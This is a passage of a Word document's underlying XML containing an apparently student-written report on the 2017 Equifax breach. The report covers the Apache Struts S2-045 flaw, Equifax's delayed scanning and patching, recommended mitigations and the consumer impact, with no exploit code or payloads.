        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At the time </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco's Talos security division </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">warned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that are potentially vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailing that the exploit itself was adamantly difficult to easily patch due to the widespread nature of the </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2" w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Jakarta Multipart </w:t>
      </w:r>
      <w:r w:rsidR="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in this exploit which coincidently applies to several Java Oracle devices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063157C5" w14:textId="5C4B6D56" w:rsidR="0008424C" w:rsidRDefault="004F28D1" w:rsidP="00C73724">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVSS scores,</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided in Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, detail the report at the highest possible critical value. Known exploits, (unless listed as false-positives), going unsolved for a </w:t>
      </w:r>
      <w:r w:rsidR="00416C2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seven-month</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">period </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allowed for this controversy to cause a great uproar in the cybersecurity community.</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Considering the information of the victims being at such a high target mixed with the even higher target of the company itself, </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the uproar is understandable.</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability scans performed by Equifax were reportedly observed on July 29</w:t>
      </w:r>
      <w:r w:rsidR="00566573" w:rsidRPr="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00566573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, five months after the official release of the vulnerability itself.</w:t>
      </w:r>
      <w:r w:rsidR="006B474D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE575B" w14:textId="2B63C393" w:rsidR="006B474D" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78C5ACF0" wp14:editId="665A6D6A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>923925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2924175" cy="3451225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21461"/>
                <wp:lineTo x="21530" y="21461"/>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0801"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2924175" cy="345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74D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The first steps in company mitigation should have been for scanning for vulnerabilities themselves. A five-month period spanning between vulnerability release and observation leads to believe that Equifax was in dire need of VM distribution over the manager admin interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> under a scheduled process</w:t>
      </w:r>
      <w:r w:rsidR="006B474D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. After observation, the proper steps could have been taken to resolve the critical vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00F92C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. An example of a vulnerability scanner is Tenable Nessus Enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B0FBB" w14:textId="66BB8E03" w:rsidR="00582DA9" w:rsidRDefault="00C73724" w:rsidP="00DF2F57">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8BD222" wp14:editId="2D1AF972">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>4400550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2924175" cy="243840"/>
                <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20250"/>
                    <wp:lineTo x="21530" y="20250"/>
                    <wp:lineTo x="2153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175" cy="243840"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>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BD222" id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:179.05pt;margin-top:346.5pt;width:230.25pt;height:19.2pt;z-index:-2516469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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">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v:textbox>
                <w10:wrap type="tight" anchorx="margin" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F92C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Following a proper, and consistent vulnerability scan, the next obvious state is to update the vulne</w:t>
      </w:r>
      <w:r w:rsidR="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rable system. S2-045, created on Mar </w:t>
      </w:r>
      <w:r w:rsidR="00582DA9" w:rsidRPr="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00582DA9" w:rsidRPr="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2017 is the currently publicly available patch for such a system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15DECB" w14:textId="44EA2C8A" w:rsidR="00582DA9" w:rsidRDefault="00582DA9" w:rsidP="00DF2F57">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mitigations to the vulnerability exist prior to the released patch however.</w:t>
      </w:r>
      <w:r w:rsidR="00215C83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, </w:t>
      </w:r>
      <w:r w:rsidR="00215C83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>temporary restricted access to policy managing administrator privileges until a fix is implemented could have potentially limited any unwarranted access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E611D" w14:textId="0196286C" w:rsidR="00215C83" w:rsidRDefault="00215C83" w:rsidP="00215C83">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Early research and development to a patch allows for quicker response to damage as well. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Equifax could have prevented </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>emote Code Execution (R</w:t>
      </w:r>
      <w:r w:rsidRPr="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a malicious Content-Type value, especially with early detection, by validating Content-type and checking suspicious variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EFBF9" w14:textId="4ABF087F" w:rsidR="00F94351" w:rsidRDefault="00F94351" w:rsidP="00DF2F57">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack impacted approximately 145.5 million U.S. consumers along with several million Canadian and British residents. </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he Equifax breach</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the first</w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its kind that</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>leaked</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">name, address, birth </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">date, </w:t>
      </w:r>
      <w:r w:rsidR="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">credit card, </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and Social Security number</w:t>
      </w:r>
      <w:r w:rsidR="00DF2F57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of several million </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sent to the deep web </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all at once</w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidR="0008424C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is considered one of the worst data breaches in internet history.</w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Not only is the information vital to a user’s everyday living and financials, so many users were affected that the repair process is near impossible.</w:t>
      </w:r>
      <w:r w:rsidR="0030178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EEC877" w14:textId="4A61A224" w:rsidR="00DF2F57" w:rsidRPr="007D02A2" w:rsidRDefault="00E36FC7" w:rsidP="00DF2F57">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On the user’s end, mitigation involves freezing credit, changing home addresses, card numbers, phone numbers, and request of name change. At this point, the user would still be vulnerable to the Equifax breach and considering that the information applied to nearly a third of Americans, the only solace found can be that an individual’s identity can hide amongst the crowd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64CFAF" w14:textId="77777777" w:rsidR="00882C80" w:rsidRDefault="00DF2F57" w:rsidP="00DF2F57">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">According to a later released report, </w:t>
      </w:r>
      <w:r w:rsidR="00C73724" w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">actual </w:t>
      </w:r>
      <w:r w:rsidR="00C73724" w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">total </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of affected used </w:t>
      </w:r>
      <w:r w:rsidR="00C73724" w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">was around 147.9 million. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Of the extra</w:t>
      </w:r>
      <w:r w:rsidR="00C73724" w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4 million people</w:t>
      </w:r>
      <w:r>
        <w:rPr>
